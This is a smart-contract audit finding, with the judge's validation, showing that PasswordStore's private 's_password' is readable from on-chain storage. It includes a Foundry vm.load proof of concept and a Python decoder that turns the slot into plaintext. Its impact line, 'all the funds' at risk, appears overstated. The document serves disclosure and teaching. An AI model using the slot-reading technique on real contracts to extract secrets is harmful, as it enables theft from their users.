Submission Details
Severity: high
Valid

s_password private state variable can be read on-chain

Summary

The PasswordStore::s_password state variable is declared with the private visibility modifier. This makes it vulnerable: because all data on-chain is public, a malicious actor can read the password string, which is supposed to be secret.

Vulnerability Details

PasswordStore::s_password

string private s_password;

In the code above, the variable "s_password" is declared as a private variable. Because it is a very important and sensitive variable for the contract, it should not be visible to anyone but the contract owner.
But everything on-chain is public, so this sensitive data can be exposed to an unintended actor, which puts it in real danger.

POC

In PasswordStore.t.sol, add the following test function, which proves that contract storage can be read even when it is private:

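function test_non_owner_can_read_password() public {
    // vm.load reads a raw storage slot of any address; here, slot 1 of passwordStore.
    bytes32 password = vm.load(address(passwordStore), bytes32(uint256(1)));
    // Log the raw 32-byte slot word as a uint256.
    console.log(uint256(password));
}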
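
The PoC logs the slot as a uint256 rather than as text. The following is an added example, not part of the submission, that decodes such a word according to Solidity's storage layout for `string`, so a reviewer can confirm the slot holds the plaintext. The function names and the sample value "myPassword" are constructed for illustration.

```python
# Added example (not from the submission): decode the 32-byte word of a
# Solidity `string` storage slot, given as the uint256 that the PoC logs.
# Storage layout for `string`/`bytes`:
#   short (<= 31 bytes): data left-aligned, lowest-order byte = length * 2
#   long  (>= 32 bytes): slot holds length * 2 + 1, data at keccak256(slot)

def decode_string_slot(word: int) -> dict:
    if not 0 <= word < 2**256:
        raise ValueError("slot word must fit in 256 bits")
    if word & 1:
        # Long string: only the length lives here; content is in later slots.
        length = (word - 1) // 2
        return {"kind": "long", "length": length,
                "data_slots": (length + 31) // 32, "value": None}
    raw = word.to_bytes(32, "big")
    length = raw[31] // 2
    if length > 31 or any(raw[length:31]):
        raise ValueError("not a valid short-string encoding")
    return {"kind": "short", "length": length,
            "value": raw[:length].decode("utf-8", errors="replace")}


def sample_short_word(text: str) -> int:
    """Build a constructed slot word for a short string (test input only)."""
    data = text.encode("utf-8")
    if len(data) > 31:
        raise ValueError("sample helper only covers short strings")
    return int.from_bytes(data.ljust(31, b"\x00") + bytes([len(data) * 2]), "big")


# Constructed sample; "myPassword" is a placeholder, not a value from the page.
SAMPLE_WORD = sample_short_word("myPassword")

if __name__ == "__main__":
    print(SAMPLE_WORD)                      # the form console.log(uint256(...)) prints
    print(decode_string_slot(SAMPLE_WORD))  # plaintext recovered from the slot
    print(decode_string_slot(81))           # long string: length 40 in 2 data slots
```
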

Impact

All the funds in the contract are at risk if the password is revealed.

Tools Used

Manual review, Foundry

Recommendations

Avoid storing sensitive data on-chain, or encrypt it before storing.

Updates

Lead Judging Commences

inallhonesty Lead Judge
almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case, private doesn't mean secret/confidential.
